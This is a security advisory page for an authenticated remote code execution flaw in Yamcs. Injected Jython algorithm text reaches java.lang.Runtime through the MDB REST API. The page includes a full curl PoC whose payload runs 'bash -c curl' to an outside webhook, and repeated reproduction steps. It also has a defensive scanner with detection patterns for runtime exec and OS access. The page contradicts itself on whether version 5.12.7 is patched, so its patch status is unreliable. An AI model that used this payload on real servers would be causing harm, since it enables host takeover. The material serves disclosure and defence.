Yamcs Vulnerable to Authenticated Remote Code Execution (RCE) via Jython Algorithm Code Injection
Description
Summary
A Server-Side Code Injection vulnerability exists in the Yamcs script evaluation engine for Python algorithms. The application dynamically compiles and evaluates user-controlled algorithm text using Jython (via the JSR-223 ScriptEngine API) without enforcing a secure sandbox. An authenticated user with the ChangeMissionDatabase privilege can exploit this by overriding the algorithm logic through the REST API, achieving Remote Code Execution (RCE) on the underlying host operating system.
Details
The vulnerability lies in how Yamcs handles dynamic script evaluation. When a user updates an algorithm via the MDB (Mission Database) API (/api/mdb/{instance}/realtime/algorithms/{name}), the AlgorithmManager uses the ScriptAlgorithmExecutorFactory to instantiate a JSR-223 ScriptEngine (in this case, Jython/Python).
Because Jython allows seamless interoperability with native Java classes, an attacker can import and execute arbitrary Java classes such as java.lang.Runtime. Any valid Python algorithm can be overwritten with a malicious payload that executes OS-level commands.
PoC
Prerequisites:
1. A running Yamcs instance with the Jython engine available in its classpath (e.g., jython-standalone dependency included).
2. An active authentication token for a user with the SystemPrivilege.ChangeMissionDatabase privilege.
3. An existing algorithm defined in the Mission Database (MDB) with its language explicitly set to python (e.g., a custom poc algorithm).
*Note: Yamcs prevents changing the underlying language engine of an algorithm via the API, so an existing Python algorithm must be targeted.*
Exploitation Steps:
- Send an authenticated HTTP PATCH request to the MDB API endpoint to inject the malicious Jython code into the existing Python algorithm. The payload leverages java.lang.Runtime to execute an OS command (e.g., triggering an external webhook or a reverse shell).
curl -i -X PATCH http://:8090/api/mdb/myproject/realtime/algorithms/myproject/poc \
-H 'Content-Type: application/json' \
-H 'Authorization: Bearer <YOUR_AUTH_TOKEN>' \
-d '{
"action": "SET",
"algorithm": {
"text": "import java.lang.Runtime\njava.lang.Runtime.getRuntime().exec([\"bash\", \"-c\", \"curl https:///RCE\"])\nout0.value = 1.0"
}
}'
*(Note: Assigning a valid output like out0.value = 1.0 ensures the algorithm returns the expected data type to the Yamcs internal processor, preventing crash loops and ensuring clean execution).*
- Trigger the algorithm evaluation by sending telemetry data that the algorithm depends on (e.g., running the simulator.py script to update the required parameters like Sunsensor).
- The Yamcs server compiles the injected text into an executable script on the fly.
- Verify that the OS command executed successfully on the host machine by checking the incoming HTTP request on the provided webhook URL.
Impact
This vulnerability affects any Yamcs deployment where users are granted the ChangeMissionDatabase privilege and a scripting engine (like Jython) is present in the classpath. An attacker can leverage this to escalate application-level configuration privileges to full System/OS control, leading to arbitrary command execution, data exfiltration, and potential lateral movement within the hosting infrastructure.
Credits
Discovered & reported by Pablo Picurelli Ortiz (@superpegaso2703), cybersecurity student at Universidad Rey Juan Carlos.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Authenticated code injection in Yamcs via Jython script evaluation allows RCE on the host OS.
Vulnerability
A server-side code injection vulnerability exists in the Yamcs script evaluation engine for Python algorithms. The application dynamically compiles and evaluates user-controlled algorithm text using Jython via the JSR-223 ScriptEngine API without enforcing a secure sandbox. An authenticated user with the ChangeMissionDatabase privilege can override algorithm logic through the REST API endpoint /api/mdb/{instance}/realtime/algorithms/{name}. The vulnerability affects Yamcs instances that include the Jython engine in their classpath (e.g., jython-standalone dependency). [1][2]
Exploitation
The attacker must have a valid authentication token for a user with the SystemPrivilege.ChangeMissionDatabase privilege and an existing algorithm in the Mission Database (MDB) whose language is set to python (Yamcs prevents changing the language engine of an algorithm via the API). An authenticated HTTP PATCH request is sent to the MDB API endpoint to inject malicious Jython code into the existing Python algorithm. The payload leverages Java classes accessible from Jython, such as java.lang.Runtime, to execute arbitrary OS commands. [1][2]
Impact
Successful exploitation results in remote code execution (RCE) on the underlying host operating system. The attacker can execute arbitrary OS-level commands with the privileges of the Yamcs process, leading to full compromise of confidentiality, integrity, and availability of the affected system. [1][2]
Mitigation
As of the publication date (2026-05-27), no patch or official fix has been released for CVE-2026-46621. The Yamcs project has been notified and is investigating mitigations. Until a fix is available, administrators should restrict access to the affected API endpoint to only trusted, necessary users and consider removing the Jython engine from the classpath if not required. The vulnerability is not listed on CISA's Known Exploited Vulnerabilities (KEV) catalog as of this writing. [1][2]
AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
| org.yamcs:yamcs-core (Maven) | < 5.12.7 | 5.12.7 |
Affected products: 2
Patches: 0
No patches discovered yet.
Vulnerability mechanics
Root cause
"Missing secure sandbox enforcement in the Jython ScriptEngine allows user-controlled algorithm text to import and execute arbitrary Java classes such as java.lang.Runtime."
Attack vector
An authenticated attacker with the `ChangeMissionDatabase` privilege sends an HTTP PATCH request to `/api/mdb/{instance}/realtime/algorithms/{name}` with a JSON body containing malicious Jython code in the `algorithm.text` field [ref_id=1][ref_id=2]. The payload imports `java.lang.Runtime` and calls `getRuntime().exec()` to execute OS commands. The attacker must target an existing algorithm whose language is already set to `python`, as the API prevents changing the language engine. After injection, the attacker triggers algorithm evaluation by sending telemetry data that the algorithm depends on, causing the server to compile and execute the malicious script [ref_id=1][ref_id=2].
Affected code
The vulnerability is in the Yamcs script evaluation engine for Python algorithms. When a user updates an algorithm via the MDB API endpoint `/api/mdb/{instance}/realtime/algorithms/{name}`, the `AlgorithmManager` uses `ScriptAlgorithmExecutorFactory` to instantiate a JSR-223 `ScriptEngine` (Jython/Python) without enforcing a secure sandbox [ref_id=1][ref_id=2]. The Jython engine allows seamless interoperability with native Java classes, enabling arbitrary code execution.
What the fix does
The advisory does not provide a patch or specific remediation code [ref_id=1][ref_id=2]. The recommended fix would involve enforcing a secure sandbox around the Jython `ScriptEngine` to prevent access to dangerous Java classes such as `java.lang.Runtime`. Without such a sandbox, any authenticated user with the `ChangeMissionDatabase` privilege can escalate to full OS-level command execution.
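A defender-side check that follows from the mechanics above, added here as an example (not code from the advisory or from Yamcs): it scans captured MDB algorithm update requests for Jython constructs that reach into the JVM or the OS, so that updates like the one described can be flagged at a reverse proxy or in a change-review pipeline, alongside restricting the ChangeMissionDatabase privilege. It assumes request bodies in the `{"action":"SET","algorithm":{"text":...}}` shape shown in the PoC and treats the processor path segment generically; the pattern list and the sample requests are constructed.

```python
import json
import re

# Endpoint from the advisory: /api/mdb/{instance}/realtime/algorithms/{name}
# (the processor segment is matched generically; assumption, not from the page).
ALGO_ENDPOINT = re.compile(r"^/api/mdb/[^/]+/[^/]+/algorithms/.+$")

# Jython constructs that cross into the JVM or the OS. A constructed starting
# point for review, not a substitute for a real ScriptEngine sandbox.
SUSPICIOUS = [
    (re.compile(r"\bimport\s+java\b|\bfrom\s+java\b"), "java-import"),
    (re.compile(r"java\.lang\.(Runtime|ProcessBuilder|System)\b"), "jvm-process-api"),
    (re.compile(r"\bgetRuntime\(\)\.exec\b"), "runtime-exec"),
    (re.compile(r"\b(os\.system|subprocess|__import__)\b"), "python-os-access"),
]

def audit_algorithm_text(text: str) -> list[str]:
    """Labels of every suspicious construct present in an algorithm's text."""
    return [label for pattern, label in SUSPICIOUS if pattern.search(text)]

def audit_request(method: str, path: str, body: str) -> dict[str, object]:
    """Classify one captured request; only PATCH to the algorithms endpoint is in scope."""
    result: dict[str, object] = {"path": path, "in_scope": False, "findings": []}
    if method.upper() != "PATCH" or not ALGO_ENDPOINT.match(path):
        return result
    result["in_scope"] = True
    try:
        payload = json.loads(body)
    except ValueError:
        result["findings"] = ["unparseable-body"]  # hold for manual review, never pass
        return result
    algorithm = payload.get("algorithm") if isinstance(payload, dict) else None
    text = algorithm.get("text") if isinstance(algorithm, dict) else None
    result["findings"] = audit_algorithm_text(text if isinstance(text, str) else "")
    return result

# Constructed sample: a benign update, an update shaped like the advisory's
# payload (with a harmless command), and an out-of-scope read.
SAMPLE_REQUESTS = [
    ("PATCH", "/api/mdb/myproject/realtime/algorithms/myproject/poc",
     json.dumps({"action": "SET", "algorithm": {"text": "out0.value = in0.value * 2.0"}})),
    ("PATCH", "/api/mdb/myproject/realtime/algorithms/myproject/poc",
     json.dumps({"action": "SET", "algorithm": {"text":
         "import java.lang.Runtime\njava.lang.Runtime.getRuntime().exec([\"true\"])\nout0.value = 1.0"}})),
    ("GET", "/api/mdb/myproject/realtime/algorithms/myproject/poc", ""),
]

def flagged_requests(requests=SAMPLE_REQUESTS) -> list[dict[str, object]]:
    """Audit results for the requests that carry at least one finding."""
    return [r for r in (audit_request(m, p, b) for m, p, b in requests) if r["findings"]]
```

Run over the constructed sample, only the second request is flagged; a body that fails to parse is reported rather than silently accepted.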
Preconditions
- config: A running Yamcs instance with the Jython engine available in its classpath (e.g., jython-standalone dependency included)
- auth: An active authentication token for a user with the SystemPrivilege.ChangeMissionDatabase privilege
- input: An existing algorithm defined in the Mission Database (MDB) with its language explicitly set to python
- network: Network access to the Yamcs REST API endpoint /api/mdb/{instance}/realtime/algorithms/{name}
Reproduction
**Prerequisites:** A running Yamcs instance with Jython in its classpath, an auth token for a user with `ChangeMissionDatabase` privilege, and an existing algorithm with language set to `python`.
**Steps:**
1. Send an authenticated HTTP PATCH to `/api/mdb/{instance}/realtime/algorithms/{name}` with payload: `{"action":"SET","algorithm":{"text":"import java.lang.Runtime\njava.lang.Runtime.getRuntime().exec([\"bash\",\"-c\",\"curl https://<WEBHOOK>/RCE\"])\nout0.value = 1.0"}}`.
2. Trigger algorithm evaluation by sending telemetry data the algorithm depends on (e.g., running simulator.py to update parameters like `Sunsensor`).
3. Verify OS command execution by checking the webhook for an incoming request [ref_id=1][ref_id=2].
Generated on May 27, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References: 2
News mentions: 0
No linked articles in our index yet.